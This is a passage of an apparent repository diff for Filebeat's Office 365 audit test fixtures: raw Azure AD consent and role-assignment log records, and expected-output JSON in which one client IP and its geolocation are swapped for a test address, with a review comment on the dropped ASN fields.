{"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622848"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": 
"1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "24524679-8930-4afd-83b8-2dc70aa0a016"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": 
"TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": 
"env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": 
"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "User.UPN", "OldValue": "", "NewValue": "asr@testsiem.onmicrosoft.com"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "OldValue": "", "Name": "TargetId.ServicePrincipalNames"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, 
{"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-11T16:45:42", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": 
"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem2"}, {"Type": 2, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Type": 4, "ID": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ModifiedProperties": [{"Name": "User.ObjectID", "OldValue": "", "NewValue": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"NewValue": "asr@testsiem.onmicrosoft.com", "OldValue": "", "Name": "User.UPN"}, {"Name": "User.PUID", "OldValue": "", "NewValue": "1003200096971F55"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "UserManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "fb91e9f0-9485-4a68-89e9-a164d20ae855"}, {"Name": "extendedAuditEventCategory", "Value": "User"}, {"Name": "targetSPN", "Value": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40"}, {"Name": "targetName", "Value": "siem2"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"User.ObjectID\",\"User.UPN\",\"User.PUID\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "1e80f57e-764e-4c42-bead-7ccf998fe780"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": 
"[{\"ObjectID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"ObjectClass\":\"User\",\"UPN\":\"asr@testsiem.onmicrosoft.com\",\"PUID\":\"1003200096971F55\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-11T16:45:42.1421458Z"}, {"Name": "env_epoch", "Value": "748B6"}, {"Name": "env_seqNum", "Value": "34622843"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR571"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment grant to user.", "Id": "fb84e87b-9a45-49bf-91d8-30f3880ca99d"}
diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json b/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json
index 2ed3a80f2cdb..e921cb058040 100644
--- a/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json
+++ b/x-pack/filebeat/module/o365/audit/test/08-azuread.log-expected.json
@@ -1,8 +1,8 @@
 [
 {
 "@timestamp": "2020-02-09T15:33:26.000Z",
- "client.address": "83.57.233.151",
- "client.ip": "83.57.233.151",
+ "client.address": "175.16.199.1",
+ "client.ip": "175.16.199.1",
 "event.action": "Update application.",
 "event.category": "web",
 "event.code": "AzureActiveDirectory",
@@ -46,9 +46,9 @@
 }
 ],
 "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "o365.audit.ActorIpAddress": "83.57.233.151",
+ "o365.audit.ActorIpAddress": "175.16.199.1",
 "o365.audit.AzureActiveDirectoryEventType": 1,
- "o365.audit.ClientIP": "83.57.233.151",
+ "o365.audit.ClientIP": "175.16.199.1",
 "o365.audit.CreationTime": "2020-02-09T15:33:26",
 "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e",
 "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
@@ -124,20 +124,18 @@
 "o365.audit.Version": 1,
 "o365.audit.Workload": "AzureActiveDirectory",
 "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
- "related.ip": "83.57.233.151",
+ "related.ip": "175.16.199.1",
 "related.user": "asr",
 "service.type": "o365",
- "source.as.number": 3352,
- "source.as.organization.name": "Telefonica De Espana",
- "source.geo.city_name": "Barcelona",
- "source.geo.continent_name": "Europe",
- "source.geo.country_iso_code": "ES",
- "source.geo.country_name": "Spain",
- "source.geo.location.lat": 41.3891,
- "source.geo.location.lon": 2.1611,
- "source.geo.region_iso_code": "ES-B",
- "source.geo.region_name": "Barcelona",
- "source.ip": "83.57.233.151",
+ "source.geo.city_name": "Changchun",
+ "source.geo.continent_name": "Asia",
+ "source.geo.country_iso_code": "CN",
+ "source.geo.country_name": "China",
+ "source.geo.location.lat": 43.88,
+ "source.geo.location.lon": 125.3228,
+ "source.geo.region_iso_code": "CN-22",
+ "source.geo.region_name": "Jilin Sheng",
+ "source.ip": "175.16.199.1",
 "tags": [
 "forwarded"
 ],
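Review bot: The new expected output drops `source.as.number` and `source.as.organization.name` for every event (first at `@@ -124,20 +124,18 @@`, and in every later `source.*` hunk of this file), so the fixture no longer exercises ASN enrichment while it still exercises geo enrichment. Swapping a publicly attributable address for a test one is the right direction, but the diff is silent about the lost fields; presumably the test GeoIP database carries a city record for 175.16.199.1 and no ASN record, and that trade-off should be stated in the commit message or the fixture's README so the missing AS fields are not later read as a pipeline regression. Note also that 175.16.199.1 is not in an RFC 5737 documentation range (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so it remains a routable address that would geolocate to a real network if the fixture were ever run against a production database.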
@@ -148,8 +146,8 @@ }, { "@timestamp": "2020-02-09T15:33:26.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -164,7 +162,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 5611, + "log.offset": 5609, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -193,9 +191,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:33:26", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -271,20 +269,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -295,8 +291,8 @@ }, { "@timestamp": "2020-02-09T15:33:26.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update application.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -311,7 +307,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 11222, + "log.offset": 11218, "network.type": "ipv4", "o365.audit.Actor": [ { 
@@ -340,9 +336,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:33:26", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -418,20 +414,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], @@ -442,8 +436,8 @@ }, { "@timestamp": "2020-02-09T15:33:26.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", 
@@ -458,7 +452,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 16833, + "log.offset": 16827, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -487,9 +481,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:33:26", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -574,20 +568,18 @@ "o365.audit.Version": 1, "o365.audit.Workload": "AzureActiveDirectory", "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "related.ip": "83.57.233.151", + "related.ip": "175.16.199.1", "related.user": "asr", "service.type": "o365", - "source.as.number": 3352, - "source.as.organization.name": "Telefonica De Espana", - "source.geo.city_name": "Barcelona", - "source.geo.continent_name": "Europe", - "source.geo.country_iso_code": "ES", - "source.geo.country_name": "Spain", - "source.geo.location.lat": 41.3891, - "source.geo.location.lon": 2.1611, - "source.geo.region_iso_code": "ES-B", - "source.geo.region_name": "Barcelona", - "source.ip": "83.57.233.151", + "source.geo.city_name": "Changchun", + "source.geo.continent_name": "Asia", + "source.geo.country_iso_code": "CN", + "source.geo.country_name": "China", + "source.geo.location.lat": 43.88, + "source.geo.location.lon": 125.3228, + "source.geo.region_iso_code": "CN-22", + "source.geo.region_name": "Jilin Sheng", + "source.ip": "175.16.199.1", "tags": [ "forwarded" ], 
@@ -598,8 +590,8 @@ }, { "@timestamp": "2020-02-09T15:33:26.000Z", - "client.address": "83.57.233.151", - "client.ip": "83.57.233.151", + "client.address": "175.16.199.1", + "client.ip": "175.16.199.1", "event.action": "Update service principal.", "event.category": "web", "event.code": "AzureActiveDirectory", @@ -614,7 +606,7 @@ "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "host.name": "testsiem.onmicrosoft.com", "input.type": "log", - "log.offset": 20744, + "log.offset": 20736, "network.type": "ipv4", "o365.audit.Actor": [ { @@ -643,9 +635,9 @@ } ], "o365.audit.ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "o365.audit.ActorIpAddress": "83.57.233.151", + "o365.audit.ActorIpAddress": "175.16.199.1", "o365.audit.AzureActiveDirectoryEventType": 1, - "o365.audit.ClientIP": "83.57.233.151", + "o365.audit.ClientIP": "175.16.199.1", "o365.audit.CreationTime": "2020-02-09T15:33:26", "o365.audit.ExtendedProperties.actorAppID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", "o365.audit.ExtendedProperties.actorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
